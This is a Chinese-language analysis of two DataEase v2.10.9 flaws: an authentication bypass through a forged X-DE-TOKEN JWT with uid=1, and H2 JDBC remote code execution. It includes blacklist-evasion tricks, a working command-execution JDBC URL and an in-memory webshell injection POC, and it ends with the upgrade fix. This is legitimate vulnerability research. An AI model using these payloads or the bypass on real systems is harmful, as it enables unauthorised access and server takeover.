DataEase 权限绕过与远程代码执行漏洞分析<\/h1>

漏洞概述<\/h2>

DataEase 存在两个关键安全漏洞：<\/p>

权限绕过漏洞：通过特定方式构造请求可绕过身份验证<\/li>

远程代码执行漏洞：通过H2数据库连接功能可实现任意命令执行<\/li> <\/ol>

环境准备<\/h2>

调试环境搭建<\/h3>

Kali Linux端配置<\/strong>：<\/p>

修改DataEase配置文件：<\/li> <\/ol>
vi \/opt\/dataease2.0\/docker-compose.yml <\/span><\/span><\/code><\/pre> 添加\/修改以下配置：<\/li> <\/ol> environment<\/span>: <\/span><\/span> - JAVA_DEBUG=true<\/span> <\/span><\/span>ports<\/span>: <\/span><\/span> - ${DE_PORT}:8100<\/span> <\/span><\/span> - 5005<\/span>:5005<\/span> <\/span><\/span><\/code><\/pre> 重启DataEase服务：<\/li> <\/ol> dectl restart <\/span><\/span><\/code><\/pre>Windows端配置<\/strong>：<\/p> 下载DataEase源码：<\/li> <\/ol> https:\/\/github.com\/dataease\/dataease\/archive\/refs\/tags\/v2.10.9.zip <\/span><\/span><\/code><\/pre> 使用IDEA打开项目<\/li> 配置远程JVM调试<\/li> <\/ol> 权限绕过漏洞分析<\/h2> 漏洞位置<\/h3> 漏洞存在于鉴权过滤器中：<\/p> io.dataease.auth.filter.TokenFilter#doFilter<\/code><\/li> io.dataease.auth.filter.CommunityTokenFilter#doFilter<\/code><\/li> <\/ul> 通过代码对比发现，CommunityTokenFilter#doFilter<\/code>中存在验证不严问题。<\/p> 漏洞原理<\/h3> 在CommunityTokenFilter#doFilter<\/code>中，验证token失败时没有直接退出程序，而是继续执行doFilter<\/code>，导致权限绕过<\/li> 通过构造特定请求头可绕过鉴权<\/li> <\/ol> 绕过条件<\/h3> 请求头中需要包含X-DE-TOKEN<\/code>（JWT格式）<\/li> X-DE-TOKEN<\/code>长度需小于100<\/li> JWT中需要包含uid<\/code>字段，且uid=1<\/code>即可<\/li> <\/ol> 有效JWT示例<\/h3> { <\/span><\/span> "typ"<\/span>: "JWT"<\/span>, <\/span><\/span> "alg"<\/span>: "HS256"<\/span> <\/span><\/span>}.<\/span>{ <\/span><\/span> "uid"<\/span>: 1<\/span>, <\/span><\/span> "oid"<\/span>: 1<\/span>, <\/span><\/span> "exp"<\/span>: 1750250627<\/span> <\/span><\/span>}.mpUhKHy<\/span>1<\/span>CPfhyb<\/span>9<\/span>w-flz<\/span>9<\/span>oTIFF<\/span>52<\/span>dB<\/span>2<\/span>QoXvnmnA<\/span>0<\/span>vRs<\/span> <\/span><\/span><\/code><\/pre>Base64编码后的JWT：<\/p> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjoxNzUwMjUwNjI3fQ.mpUhKHy1CPfhyb9w-flz9oTIFF52dB2QoXvnmnA0vRs <\/code><\/pre> H2数据库远程代码执行漏洞<\/h2> 漏洞位置<\/h3> 主要涉及以下关键类：<\/p> io.dataease.datasource.provider.CalciteProvider#getConnection<\/code><\/li> io.dataease.datasource.type.H2#getJdbc<\/code><\/li> <\/ul> 漏洞原理<\/h3> 通过H2数据库的JDBC连接功能，可利用其特性执行任意命令<\/li> 需要绕过黑名单限制（检测INIT<\/code>、RUNSCRIPT<\/code>等关键字）<\/li> <\/ol> 绕过黑名单方法<\/h3> 使用大小写变形：Init<\/code>代替INIT<\/code><\/li> 使用转义字符：I\N\I\T<\/code><\/li> <\/ol> 命令执行POC<\/h3> jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INit=CREATE ALIAS if not exists EXEC AS 'void exec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)}';CALL EXEC('touch \/tmp\/1'); <\/code><\/pre> H2 JDBC内存马注入<\/h3> 参考文章：<\/p> https:\/\/mp.weixin.qq.com\/s\/PlRwbc5AhJDjPwIZcUv5Rw<\/li> https:\/\/www.leavesongs.com\/PENETRATION\/talk-about-h2database-rce.html<\/li> <\/ul> 示例POC（需替换tomcatStr<\/code>为实际内存马代码）：<\/p> jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INiT=CREATE ALIAS if not exists AQWSSSAZ AS 'void shellexec(String abc) throws java.lang.Exception{byte[] standBytes=null\\;String tomcatStr=\"\"\\;java.lang.Class unsafeClass=java.lang.Class.forName(\"sun.misc.Unsafe\")\\;java.lang.reflect.Field unsafeField=unsafeClass.getDeclaredField(\"theUnsafe\")\\;unsafeField.setAccessible(true)\\;sun.misc.Unsafe unsafe=(sun.misc.Unsafe)unsafeField.get(null)\\;java.lang.Module module=java.lang.Object.class.getModule()\\;java.lang.Class cls=AQWSSSAZ.class\\;long offset=unsafe.objectFieldOffset(java.lang.Class.class.getDeclaredField(\"module\"))\\;unsafe.getAndSetObject(cls,offset,module)\\;java.lang.reflect.Method defineClass=java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\",byte[].class,java.lang.Integer.TYPE,java.lang.Integer.TYPE)\\;defineClass.setAccessible(true)\\;byte[] bytecode=java.util.Base64.getDecoder().decode(tomcatStr)\\;java.lang.Class clazz=(java.lang.Class)defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(),bytecode,0,bytecode.length)\\;clazz.newInstance(CALL AQWSSSAZ('calc')" <\/code><\/pre> 修复方案<\/h2> 升级到DataEase v2.10.10或更高版本<\/li> 修复commit对比： https:\/\/github.com\/dataease\/dataease\/releases<\/li> https:\/\/github.com\/dataease\/dataease\/compare\/v2.10.9...v2.10.10<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> H2数据库RCE分析： https:\/\/www.leavesongs.com\/PENETRATION\/talk-about-h2database-rce.html<\/li> <\/ul> <\/li> Java RCE示例： https:\/\/github.com\/Whoopsunix\/JavaRce\/blob\/main\/SecVulns\/VulnCore\/JDBCAttack\/src\/main\/java\/h2database\/H2Attack.java<\/li> <\/ul> <\/li> <\/ol>